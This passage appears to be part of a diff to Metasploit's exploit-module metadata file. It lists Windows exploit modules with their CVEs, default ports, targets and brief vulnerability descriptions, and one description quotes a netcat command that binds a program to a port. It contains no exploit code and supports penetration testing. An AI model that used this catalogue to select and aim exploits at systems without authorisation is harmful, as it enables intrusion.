8.0.", + "references": [ + "CVE-2007-3901", + "OSVDB-39126", + "MSB-MS07-064", + "BID-26789" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ms07_064_sami.rb", + "is_install_path": true, + "ref_name": "windows/misc/ms07_064_sami", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ms10_104_sharepoint": { + "name": "MS10-104 Microsoft Office SharePoint Server 2007 Remote Code Execution", + "fullname": "exploit/windows/misc/ms10_104_sharepoint", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-12-14", + "type": "exploit", + "author": [ + "Oleksandr Mirosh", + "James Burton", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found in SharePoint Server 2007 SP2. The\n software contains a directory traversal, that allows a remote attacker to write\n arbitrary files to the filesystem, sending a specially crafted SOAP ConvertFile\n request to the Office Document Conversions Launcher Service, which results in code\n execution under the context of 'SYSTEM'.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of SharePoint on Windows 2003 Servers.\n It has been successfully tested on Office SharePoint Server 2007 SP2 over Windows\n 2003 SP2.", + "references": [ + "CVE-2010-3964", + "OSVDB-69817", + "BID-45264", + "MSB-MS10-104", + "ZDI-10-287" + ], + "platform": "Windows", + "arch": "", + "rport": 8082, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Microsoft Office SharePoint Server 2007 SP2 / Microsoft Windows Server 2003 SP2" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/misc/ms10_104_sharepoint.rb", + "is_install_path": true, + "ref_name": "windows/misc/ms10_104_sharepoint", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/netcat110_nt": { + "name": "Netcat v1.10 NT Stack Buffer Overflow", + "fullname": "exploit/windows/misc/netcat110_nt", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-12-27", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in Netcat v1.10 NT. By sending\n an overly long string we are able to overwrite SEH. The vulnerability\n exists when netcat is used to bind (-e) an executable to a port in doexec.c.\n This module tested successfully using \"c:\\>nc -L -p 31337 -e ftp\".", + "references": [ + "CVE-2004-1317", + "OSVDB-12612", + "BID-12106", + "EDB-726" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal nc.exe" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/netcat110_nt.rb", + "is_install_path": true, + "ref_name": "windows/misc/netcat110_nt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/nettransport": { + "name": "NetTransport Download Manager 2.90.510 Buffer Overflow", + "fullname": "exploit/windows/misc/nettransport", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-01-02", + "type": "exploit", + "author": [ + "Lincoln", + "dookie" + ], + "description": "This exploits a stack buffer overflow in NetTransport Download Manager,\n part of the NetXfer suite. This module was tested\n successfully against version 2.90.510.", + "references": [ + "CVE-2017-17968", + "OSVDB-61435", + "EDB-10911" + ], + "platform": "Windows", + "arch": "", + "rport": 22222, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/nettransport.rb", + "is_install_path": true, + "ref_name": "windows/misc/nettransport", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/nvidia_mental_ray": { + "name": "Nvidia Mental Ray Satellite Service Arbitrary DLL Injection", + "fullname": "exploit/windows/misc/nvidia_mental_ray", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-12-10", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "Donato Ferrante", + "Ben Campbell " + ], + "description": "The Nvidia Mental Ray Satellite Service listens for control commands on port 7414.\n When it receives the command to load a DLL (via an UNC path) it will try to\n connect back to the host on port 7514. If a TCP connection is successful it will\n then attempt to load the DLL. This module has been tested successfully on Win7 x64\n with Nvidia Mental Ray Satellite Service v3.11.1.", + "references": [ + "URL-http://revuln.com/files/ReVuln_NVIDIA_mental_ray.pdf", + "OSVDB-100827" + ], + "platform": "Windows", + "arch": "", + "rport": 7414, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/nvidia_mental_ray.rb", + "is_install_path": true, + "ref_name": "windows/misc/nvidia_mental_ray", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/plugx": { + "name": "PlugX Controller Stack Buffer Overflow", + "fullname": "exploit/windows/misc/plugx", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-07-27", + "type": "exploit", + "author": [ + "Professor Plum" + ], + "description": "This module exploits a stack buffer overflow in the PlugX Controller (C2 server).", + "references": [], + "platform": "Windows", + "arch": "", + "rport": 13579, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "PlugX Type I (old)", + "PlugX Type I", + "PlugX Type II" + ], + "mod_time": "2023-07-14 12:46:26 +0000", + "path": "/modules/exploits/windows/misc/plugx.rb", + "is_install_path": true, + "ref_name": "windows/misc/plugx", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/poisonivy_21x_bof": { + "name": "Poison Ivy 2.1.x C2 Buffer Overflow", + "fullname": "exploit/windows/misc/poisonivy_21x_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-06-03", + "type": "exploit", + "author": [ + "Jos Wetzels" + ], + "description": "This module exploits a stack buffer overflow in the Poison Ivy 2.1.x C&C server.\n The exploit does not need to know the password chosen for the bot/server communication.", + "references": [ + "URL-http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware" + ], + "platform": "Windows", + "arch": "", + "rport": 3460, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Poison Ivy 2.1.4 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/poisonivy_21x_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/poisonivy_21x_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/poisonivy_bof": { + "name": "Poison Ivy Server Buffer Overflow", + "fullname": "exploit/windows/misc/poisonivy_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-06-24", + "type": "exploit", + "author": [ + "Andrzej Dereszowski", + "Gal Badishi", + "juan vazquez ", + "Jos Wetzels" + ], + "description": "This module exploits a stack buffer overflow in the Poison Ivy 2.2.0 to 2.3.2 C&C server.\n The exploit does not need to know the password chosen for the bot/server communication.", + "references": [ + "OSVDB-83774", + "EDB-19613", + "URL-http://www.signal11.eu/en/research/articles/targeted_2010.pdf", + "URL-http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/" + ], + "platform": "Windows", + "arch": "", + "rport": 3460, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1", + "Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1", + "Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/poisonivy_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/poisonivy_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/poppeeper_date": { + "name": "POP Peeper v3.4 DATE Buffer Overflow", + "fullname": "exploit/windows/misc/poppeeper_date", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-02-27", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in POP Peeper v3.4.\n When a specially crafted DATE string is sent to a client,\n an attacker may be able to execute arbitrary code. This\n module is based off of krakowlabs code.", + "references": [ + "CVE-2009-1029", + "OSVDB-53560", + "BID-34093" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "POP Peeper v3.4" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/poppeeper_date.rb", + "is_install_path": true, + "ref_name": "windows/misc/poppeeper_date", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/poppeeper_uidl": { + "name": "POP Peeper v3.4 UIDL Buffer Overflow", + "fullname": "exploit/windows/misc/poppeeper_uidl", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-02-27", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in POP Peeper v3.4.\n When a specially crafted UIDL string is sent to a client,\n an attacker may be able to execute arbitrary code. This\n module is based off of krakowlabs code.", + "references": [ + "OSVDB-53559", + "CVE-2009-1029", + "BID-33926" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "POP Peeper v3.4" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/poppeeper_uidl.rb", + "is_install_path": true, + "ref_name": "windows/misc/poppeeper_uidl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/realtek_playlist": { + "name": "Realtek Media Player Playlist Buffer Overflow", + "fullname": "exploit/windows/misc/realtek_playlist", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-12-16", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Realtek Media Player(RtlRack) A4.06.\n When a Realtek Media Player client opens a specially crafted playlist, an\n attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-5664", + "OSVDB-50715", + "BID-32860" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Realtek Media Player(RtlRack) A4.06 (XP Pro All English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/realtek_playlist.rb", + "is_install_path": true, + "ref_name": "windows/misc/realtek_playlist", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/remote_control_collection_rce": { + "name": "Remote Control Collection RCE", + "fullname": "exploit/windows/misc/remote_control_collection_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-09-20", + "type": "exploit", + "author": [ + "h00die", + "H4rk3nz0" + ], + "description": "This module utilizes the Remote Control Server's, part\n of the Remote Control Collection by Steppschuh, protocol\n to deploy a payload and run it from the server. This module will only deploy\n a payload if the server is set without a password (default).\n Tested against 3.1.1.12, current at the time of module writing", + "references": [ + "URL-http://remote-control-collection.com", + "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py" + ], + "platform": "Windows", + "arch": "x64, x86", + "rport": 1926, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "default" + ], + "mod_time": "2022-10-28 15:03:39 +0000", + "path": "/modules/exploits/windows/misc/remote_control_collection_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/remote_control_collection_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/remote_mouse_rce": { + "name": "Remote Mouse RCE", + "fullname": "exploit/windows/misc/remote_mouse_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-04-15", + "type": "exploit", + "author": [ + "h00die", + "0RPHON", + "H4rk3nz0" + ], + "description": "This module utilizes the Remote Mouse Server by Emote Interactive protocol\n to deploy a payload and run it from the server on versions < 4.200 (500 server response).\n This module will only deploy\n a payload if the server is set without a password (default).\n Tested against 4.110, current at the time of module writing", + "references": [ + "EDB-46697", + "CVE-2022-3365", + "URL-https://www.remotemouse.net/", + "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20mouse/remote-mouse-rce.py" + ], + "platform": "Windows", + "arch": "x64, x86", + "rport": 1978, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "default" + ], + "mod_time": "2022-10-17 15:30:17 +0000", + "path": "/modules/exploits/windows/misc/remote_mouse_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/remote_mouse_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/sap_2005_license": { + "name": "SAP Business One License Manager 2005 Buffer Overflow", + "fullname": "exploit/windows/misc/sap_2005_license", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-08-01", + "type": "exploit", + "author": [ + "Jacopo Cervini" + ], + "description": "This module exploits a stack buffer overflow in the SAP Business One 2005\n License Manager 'NT Naming Service' A and B releases. By sending an\n excessively long string the stack is overwritten enabling arbitrary\n code execution.", + "references": [ + "OSVDB-56837", + "CVE-2009-4988", + "BID-35933", + "EDB-9319" + ], + "platform": "Windows", + "arch": "", + "rport": 30000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Sap Business One 2005 B1 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/sap_2005_license.rb", + "is_install_path": true, + "ref_name": "windows/misc/sap_2005_license", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/sap_netweaver_dispatcher": { + "name": "SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow", + "fullname": "exploit/windows/misc/sap_netweaver_dispatcher", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-05-08", + "type": "exploit", + "author": [ + "Martin Gallo", + "juan vazquez " + ], + "description": "This module exploits a stack buffer overflow in the SAP NetWeaver Dispatcher\n service. The overflow occurs in the DiagTraceR3Info() function and allows a remote\n attacker to execute arbitrary code by supplying a special crafted Diag packet. The\n Dispatcher service is only vulnerable if the Developer Traces have been configured\n at levels 2 or 3. The module has been successfully tested on SAP Netweaver 7.0 EHP2\n SP6 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass).", + "references": [ + "OSVDB-81759", + "CVE-2012-2611", + "BID-53424", + "EDB-20705", + "URL-http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities", + "URL-http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Uncovering_SAP_vulnerabilities_reversing_and_breaking_the_Diag_protocol" + ], + "platform": "Windows", + "arch": "", + "rport": 3200, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "SAP Netweaver 7.0 EHP2 SP6 / Windows XP SP3", + "SAP Netweaver 7.0 EHP2 SP6 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb", + "is_install_path": true, + "ref_name": "windows/misc/sap_netweaver_dispatcher", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/shixxnote_font": { + "name": "ShixxNOTE 6.net Font Field Overflow", + "fullname": "exploit/windows/misc/shixxnote_font", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-10-04", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in ShixxNOTE 6.net.\n The vulnerability is caused due to boundary errors in the\n handling of font fields.", + "references": [ + "CVE-2004-1595", + "OSVDB-10721", + "BID-11409" + ], + "platform": "Windows", + "arch": "", + "rport": 2000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ShixxNOTE 6.net Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/shixxnote_font.rb", + "is_install_path": true, + "ref_name": "windows/misc/shixxnote_font", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/solarwinds_amqp_deserialization": { + "name": "SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE", + "fullname": "exploit/windows/misc/solarwinds_amqp_deserialization", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-10-19", + "type": "exploit", + "author": [ + "Justin Hong", + "Lucas Miller", + "Piotr Bazydło", + "Spencer McIntyre" + ], + "description": "The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the\n AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted\n message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\\SYSTEM.", + "references": [ + "CVE-2022-38108", + "URL-https://www.zerodayinitiative.com/blog/2023/2/27/cve-2022-38108-rce-in-solarwinds-network-performance-monitor", + "URL-https://www.solarwinds.com/trust-center/security-advisories/cve-2022-38108" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 5671, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-03-23 17:28:17 +0000", + "path": "/modules/exploits/windows/misc/solarwinds_amqp_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/misc/solarwinds_amqp_deserialization", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/solidworks_workgroup_pdmwservice_file_write": { + "name": "SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write", + "fullname": "exploit/windows/misc/solidworks_workgroup_pdmwservice_file_write", + "aliases": [], + "rank": 400, + "disclosure_date": "2014-02-22", + "type": "exploit", + "author": [ + "Mohamed Shetta ", + "bcoles " + ], + "description": "This module exploits a remote arbitrary file write vulnerability in\n SolidWorks Workgroup PDM 2014 SP2 and prior.\n\n For targets running Windows Vista or newer the payload is written to the\n startup folder for all users and executed upon next user logon.\n\n For targets before Windows Vista code execution can be achieved by first\n uploading the payload as an exe file, and then upload another mof file,\n which schedules WMI to execute the uploaded payload.\n\n This module has been tested successfully on SolidWorks Workgroup PDM\n 2011 SP0 on Windows XP SP3 (EN) and Windows 7 SP1 (EN).", + "references": [ + "CVE-2014-100015", + "EDB-31831", + "OSVDB-103671" + ], + "platform": "Windows", + "arch": "", + "rport": 30000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "SolidWorks Workgroup PDM <= 2014 SP2 (Windows XP SP0-SP3)", + "SolidWorks Workgroup PDM <= 2014 SP2 (Windows Vista onwards)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb", + "is_install_path": true, + "ref_name": "windows/misc/solidworks_workgroup_pdmwservice_file_write", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/splayer_content_type": { + "name": "SPlayer 3.7 Content-Type Buffer Overflow", + "fullname": "exploit/windows/misc/splayer_content_type", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-05-04", + "type": "exploit", + "author": [ + "xsploitedsec ", + "sinn3r " + ], + "description": "This module exploits a vulnerability in SPlayer v3.7 or prior. When SPlayer\n requests the URL of a media file (video or audio), it is possible to gain arbitrary\n remote code execution due to a buffer overflow caused by an exceeding length of data\n as the 'Content-Type' parameter.", + "references": [ + "OSVDB-72181", + "EDB-17243" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2/XP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/splayer_content_type.rb", + "is_install_path": true, + "ref_name": "windows/misc/splayer_content_type", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/stream_down_bof": { + "name": "CoCSoft StreamDown 6.8.0 Buffer Overflow", + "fullname": "exploit/windows/misc/stream_down_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-12-27", + "type": "exploit", + "author": [ + "Fady Mohamed Osman " + ], + "description": "Stream Down 6.8.0 seh based buffer overflow triggered when processing\n the server response packet. During the overflow a structured exception\n handler is overwritten.", + "references": [ + "CVE-2011-5052", + "OSVDB-78043", + "BID-51190", + "URL-http://www.dark-masters.tk/", + "URL-http://web.archive.org/web/20121024141958/http://secunia.com/advisories/47343", + "EDB-18283" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "StreamDown 6.8.0" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/misc/stream_down_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/stream_down_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/talkative_response": { + "name": "Talkative IRC v0.4.4.16 Response Buffer Overflow", + "fullname": "exploit/windows/misc/talkative_response", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-03-17", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Talkative IRC v0.4.4.16.\n When a specially crafted response string is sent to a client,\n an attacker may be able to execute arbitrary code.", + "references": [ + "OSVDB-64582", + "BID-34141", + "EDB-8227" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/talkative_response.rb", + "is_install_path": true, + "ref_name": "windows/misc/talkative_response", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/tiny_identd_overflow": { + "name": "TinyIdentD 2.2 Stack Buffer Overflow", + "fullname": "exploit/windows/misc/tiny_identd_overflow", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-05-14", + "type": "exploit", + "author": [ + "Maarten Boone", + "Jacopo Cervini " + ], + "description": "This module exploits a stack based buffer overflow in TinyIdentD\n version 2.2.\n If we send a long string to the ident service we can overwrite the\n return address and execute arbitrary code. Credit to Maarten Boone.", + "references": [ + "BID-23981", + "CVE-2007-2711", + "EDB-3925", + "OSVDB-36053" + ], + "platform": "Windows", + "arch": "", + "rport": 113, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 Server SP4 - English", + "Windows 2000 Pro All - English", + "Windows 2000 Pro All - Italian", + "Windows 2000 Pro All - French", + "Windows XP SP0/1 - English", + "Windows XP SP2 - English", + "Windows XP SP2 - Italian" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/tiny_identd_overflow.rb", + "is_install_path": true, + "ref_name": "windows/misc/tiny_identd_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-service-down" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/trendmicro_cmdprocessor_addtask": { + "name": "TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow", + "fullname": "exploit/windows/misc/trendmicro_cmdprocessor_addtask", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-12-07", + "type": "exploit", + "author": [ + "Luigi Auriemma", + "Blue" + ], + "description": "This module exploits a vulnerability in the CmdProcessor.exe component of Trend\n Micro Control Manger up to version 5.5.\n\n The specific flaw exists within CmdProcessor.exe service running on TCP port\n 20101. The vulnerable function is the CGenericScheduler::AddTask function of\n cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet,\n controlled data is copied into a 256-byte stack buffer. This can be exploited\n to execute remote code under the context of the user.", + "references": [ + "CVE-2011-5001", + "OSVDB-77585", + "ZDI-11-345" + ], + "platform": "Windows", + "arch": "", + "rport": 20101, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2003 Server SP2 (DEP Bypass)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb", + "is_install_path": true, + "ref_name": "windows/misc/trendmicro_cmdprocessor_addtask", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/ufo_ai": { + "name": "UFO: Alien Invasion IRC Client Buffer Overflow", + "fullname": "exploit/windows/misc/ufo_ai", + "aliases": [], + "rank": 200, + "disclosure_date": "2009-10-28", + "type": "exploit", + "author": [ + "Jason Geffner", + "dookie" + ], + "description": "This module exploits a buffer overflow in the IRC client component of\n UFO: Alien Invasion 2.2.1.", + "references": [ + "OSVDB-65689", + "EDB-14013" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/ufo_ai.rb", + "is_install_path": true, + "ref_name": "windows/misc/ufo_ai", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/unified_remote_rce": { + "name": "Unified Remote Auth Bypass to RCE", + "fullname": "exploit/windows/misc/unified_remote_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-02-25", + "type": "exploit", + "author": [ + "h00die", + "H4RK3NZ0" + ], + "description": "This module utilizes the Unified Remote remote control protocol to type out and\n deploy a payload. The remote control protocol can be configured to have no passwords,\n a group password, or individual user accounts. If the web page is accessible, the\n access control is set to no password for exploitation, then reverted.\n If the web page is not accessible, exploitation will be tried blindly.\n This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.", + "references": [ + "EDB-49587", + "URL-https://www.unifiedremote.com/", + "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py", + "CVE-2022-3229" + ], + "platform": "Windows", + "arch": "x64, x86", + "rport": 9512, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "default" + ], + "mod_time": "2023-04-16 10:11:01 +0000", + "path": "/modules/exploits/windows/misc/unified_remote_rce.rb", + "is_install_path": true, + "ref_name": "windows/misc/unified_remote_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "screen-effects", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/veeam_one_agent_deserialization": { + "name": "Veeam ONE Agent .NET Deserialization", + "fullname": "exploit/windows/misc/veeam_one_agent_deserialization", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-04-15", + "type": "exploit", + "author": [ + "Michael Zanetta", + "Edgar Boda-Majer", + "wvu " + ], + "description": "This module exploits a .NET deserialization vulnerability in the Veeam\n ONE Agent before the hotfix versions 9.5.5.4587 and 10.0.1.750 in the\n 9 and 10 release lines.\n\n Specifically, the module targets the HandshakeResult() method used by\n the Agent. By inducing a failure in the handshake, the Agent will\n deserialize untrusted data.\n\n Tested against the pre-patched release of 10.0.0.750. Note that Veeam\n continues to distribute this version but with the patch pre-applied.", + "references": [ + "CVE-2020-10914", + "CVE-2020-10915", + "ZDI-20-545", + "ZDI-20-546", + "URL-https://www.veeam.com/kb3144" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 2805, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2021-02-16 13:56:50 +0000", + "path": "/modules/exploits/windows/misc/veeam_one_agent_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/misc/veeam_one_agent_deserialization", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/vmhgfs_webdav_dll_sideload": { + "name": "DLL Side Loading Vulnerability in VMware Host Guest Client Redirector", + "fullname": "exploit/windows/misc/vmhgfs_webdav_dll_sideload", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-08-05", + "type": "exploit", + "author": [ + "Yorick Koster" + ], + "description": "A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,\n a component of VMware Tools. This issue can be exploited by luring a victim into\n opening a document from the attacker's share. An attacker can exploit this 